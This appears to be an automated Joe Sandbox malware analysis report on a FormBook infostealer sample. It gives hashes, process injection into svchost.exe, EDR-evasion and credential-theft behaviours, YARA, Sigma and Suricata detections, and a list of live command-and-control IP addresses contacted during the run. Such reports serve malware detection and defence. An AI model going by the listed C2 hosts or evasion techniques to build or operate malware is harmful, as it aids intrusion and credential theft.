Edit tour

Windows Analysis Report
HN1GiQ5tF7.exe

Overview

General Information

Sample name:	HN1GiQ5tF7.exe renamed because original name is a hash value
Original sample name:	c7cb9d1be13c4c8d5e6c1a2bb6f185f08fcc9f8c86eb5c11e3ef62f8b2ebaf2c.exe
Analysis ID:	1589098
MD5:	5ec27889d9aa6f6474ef1b2c34417751
SHA1:	e452b6cec160e2e4e8012847d21f567f31345696
SHA256:	c7cb9d1be13c4c8d5e6c1a2bb6f185f08fcc9f8c86eb5c11e3ef62f8b2ebaf2c
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

HN1GiQ5tF7.exe (PID: 6384 cmdline: "C:\Users\user\Desktop\HN1GiQ5tF7.exe" MD5: 5EC27889D9AA6F6474EF1B2C34417751)

svchost.exe (PID: 4456 cmdline: "C:\Users\user\Desktop\HN1GiQ5tF7.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

NkMjNSuuRDBHuZ.exe (PID: 7000 cmdline: "C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

rasautou.exe (PID: 7224 cmdline: "C:\Windows\SysWOW64\rasautou.exe" MD5: DFDBEDC2ED47CBABC13CCC64E97868F3)

NkMjNSuuRDBHuZ.exe (PID: 1200 cmdline: "C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7512 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.3710085344.0000000000490000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1422627308.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3719237360.00000000041C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3719398120.0000000004210000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.3721503493.00000000052D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1422984792.0000000003290000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3719141408.0000000002CE0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1423410145.0000000004400000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\HN1GiQ5tF7.exe", CommandLine: "C:\Users\user\Desktop\HN1GiQ5tF7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\HN1GiQ5tF7.exe", ParentImage: C:\Users\user\Desktop\HN1GiQ5tF7.exe, ParentProcessId: 6384, ParentProcessName: HN1GiQ5tF7.exe, ProcessCommandLine: "C:\Users\user\Desktop\HN1GiQ5tF7.exe", ProcessId: 4456, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\HN1GiQ5tF7.exe", CommandLine: "C:\Users\user\Desktop\HN1GiQ5tF7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\HN1GiQ5tF7.exe", ParentImage: C:\Users\user\Desktop\HN1GiQ5tF7.exe, ParentProcessId: 6384, ParentProcessName: HN1GiQ5tF7.exe, ProcessCommandLine: "C:\Users\user\Desktop\HN1GiQ5tF7.exe", ProcessId: 4456, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T09:33:38.958280+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49841	104.21.16.1	80	TCP
2025-01-11T09:34:11.559946+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49972	163.44.185.183	80	TCP
2025-01-11T09:35:03.933351+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49976	104.21.41.74	80	TCP
2025-01-11T09:35:17.397185+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49980	85.159.66.93	80	TCP
2025-01-11T09:35:31.239514+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49984	103.21.221.4	80	TCP
2025-01-11T09:35:44.733088+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49988	188.114.96.3	80	TCP
2025-01-11T09:35:57.996372+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49992	66.29.137.10	80	TCP
2025-01-11T09:36:11.301736+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49996	203.161.46.205	80	TCP
2025-01-11T09:36:25.487130+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50000	101.32.205.61	80	TCP
2025-01-11T09:36:39.940586+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50004	103.224.182.242	80	TCP
2025-01-11T09:36:53.098962+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50008	13.248.169.48	80	TCP
2025-01-11T09:37:06.430715+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50012	13.248.169.48	80	TCP
2025-01-11T09:37:21.017818+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50016	172.67.162.39	80	TCP
2025-01-11T09:37:34.176531+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50020	13.248.169.48	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T09:34:03.819288+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49969	163.44.185.183	80	TCP
2025-01-11T09:34:06.381352+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49970	163.44.185.183	80	TCP
2025-01-11T09:34:08.926155+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49971	163.44.185.183	80	TCP
2025-01-11T09:34:18.288957+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49973	104.21.41.74	80	TCP
2025-01-11T09:34:20.835940+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49974	104.21.41.74	80	TCP
2025-01-11T09:34:23.382737+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49975	104.21.41.74	80	TCP
2025-01-11T09:35:10.585904+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49977	85.159.66.93	80	TCP
2025-01-11T09:35:13.132765+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49978	85.159.66.93	80	TCP
2025-01-11T09:35:15.679715+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49979	85.159.66.93	80	TCP
2025-01-11T09:35:23.601600+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49981	103.21.221.4	80	TCP
2025-01-11T09:35:26.174728+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49982	103.21.221.4	80	TCP
2025-01-11T09:35:28.682913+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49983	103.21.221.4	80	TCP
2025-01-11T09:35:37.069777+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49985	188.114.96.3	80	TCP
2025-01-11T09:35:39.640578+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49986	188.114.96.3	80	TCP
2025-01-11T09:35:42.182622+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49987	188.114.96.3	80	TCP
2025-01-11T09:35:50.542322+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49989	66.29.137.10	80	TCP
2025-01-11T09:35:52.935360+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49990	66.29.137.10	80	TCP
2025-01-11T09:35:55.513927+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49991	66.29.137.10	80	TCP
2025-01-11T09:36:03.650469+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49993	203.161.46.205	80	TCP
2025-01-11T09:36:06.193136+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49994	203.161.46.205	80	TCP
2025-01-11T09:36:08.723274+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49995	203.161.46.205	80	TCP
2025-01-11T09:36:17.855171+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49997	101.32.205.61	80	TCP
2025-01-11T09:36:20.408910+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49998	101.32.205.61	80	TCP
2025-01-11T09:36:22.963622+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49999	101.32.205.61	80	TCP
2025-01-11T09:36:32.044915+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50001	103.224.182.242	80	TCP
2025-01-11T09:36:34.658341+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50002	103.224.182.242	80	TCP
2025-01-11T09:36:37.435680+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50003	103.224.182.242	80	TCP
2025-01-11T09:36:46.510875+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50005	13.248.169.48	80	TCP
2025-01-11T09:36:48.019131+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50006	13.248.169.48	80	TCP
2025-01-11T09:36:50.560784+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50007	13.248.169.48	80	TCP
2025-01-11T09:36:58.695099+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50009	13.248.169.48	80	TCP
2025-01-11T09:37:01.305135+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50010	13.248.169.48	80	TCP
2025-01-11T09:37:04.914521+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50011	13.248.169.48	80	TCP
2025-01-11T09:37:11.997662+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50013	172.67.162.39	80	TCP
2025-01-11T09:37:15.938864+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50014	172.67.162.39	80	TCP
2025-01-11T09:37:18.470551+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50015	172.67.162.39	80	TCP
2025-01-11T09:37:27.586307+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50017	13.248.169.48	80	TCP
2025-01-11T09:37:29.086508+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50018	13.248.169.48	80	TCP
2025-01-11T09:37:32.680171+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50019	13.248.169.48	80	TCP
2025-01-11T09:37:39.873427+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50021	104.21.4.93	80	TCP
2025-01-11T09:37:42.437859+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50022	104.21.4.93	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T09:35:13.132765+0100	2856318	1	A Network Trojan was detected	192.168.2.7	49978	85.159.66.93	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: HN1GiQ5tF7.exe	ReversingLabs: Detection: 79%
Source: HN1GiQ5tF7.exe	Virustotal: Detection: 68%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3710085344.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1422627308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3719237360.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3719398120.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3721503493.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1422984792.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3719141408.0000000002CE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1423410145.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: HN1GiQ5tF7.exe

Joe Sandbox ML: detected

Source: HN1GiQ5tF7.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NkMjNSuuRDBHuZ.exe, 0000000A.00000002.3718774324.0000000000C1E000.00000002.00000001.01000000.00000005.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3711481977.0000000000C1E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: HN1GiQ5tF7.exe, 00000000.00000003.1262838797.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, HN1GiQ5tF7.exe, 00000000.00000003.1266596103.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1332695807.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423017097.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1331273614.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423017097.000000000359E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3719745368.0000000004400000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1432677538.000000000425A000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3719745368.000000000459E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1429824826.00000000040A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: HN1GiQ5tF7.exe, 00000000.00000003.1262838797.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, HN1GiQ5tF7.exe, 00000000.00000003.1266596103.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1332695807.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423017097.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1331273614.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423017097.000000000359E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, rasautou.exe, 0000000B.00000002.3719745368.0000000004400000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1432677538.000000000425A000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3719745368.000000000459E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1429824826.00000000040A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: rasautou.exe, 0000000B.00000002.3720366813.0000000004A2C000.00000004.10000000.00040000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3712150364.0000000002817000.00000004.00000020.00020000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000000.1502841441.0000000002E9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1730647534.000000002E0DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: rasautou.exe, 0000000B.00000002.3720366813.0000000004A2C000.00000004.10000000.00040000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3712150364.0000000002817000.00000004.00000020.00020000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000000.1502841441.0000000002E9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1730647534.000000002E0DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: rasautou.pdbGCTL source: svchost.exe, 00000002.00000003.1390743608.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1422830982.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000A.00000003.1361027038.00000000005DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rasautou.pdb source: svchost.exe, 00000002.00000003.1390743608.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1422830982.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000A.00000003.1361027038.00000000005DB000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00676CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00676CA9
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_006760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_006760DD
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_006763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_006763F9
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0067EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0067EB60
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0067F56F FindFirstFileW,FindClose,	0_2_0067F56F
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0067F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0067F5FA
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00681B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00681B2F
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00681C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00681C8A
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00681F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00681F94
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_004ACC00 FindFirstFileW,FindNextFileW,FindClose,	11_2_004ACC00

Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 4x nop then xor eax, eax	11_2_0049A080
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 4x nop then pop edi	11_2_0049E774
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 4x nop then mov ebx, 00000004h	11_2_043104D8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49841 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49976 -> 104.21.41.74:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.7:49978 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49980 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49971 -> 163.44.185.183:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49984 -> 103.21.221.4:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49981 -> 103.21.221.4:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49973 -> 104.21.41.74:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 66.29.137.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 103.21.221.4:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 203.161.46.205:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50004 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49969 -> 163.44.185.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49977 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50010 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50021 -> 104.21.4.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49972 -> 163.44.185.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50001 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50014 -> 172.67.162.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50009 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50003 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50000 -> 101.32.205.61:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49992 -> 66.29.137.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49975 -> 104.21.41.74:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50015 -> 172.67.162.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 66.29.137.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 101.32.205.61:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50002 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 203.161.46.205:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49996 -> 203.161.46.205:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 66.29.137.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50006 -> 13.248.169.48:80
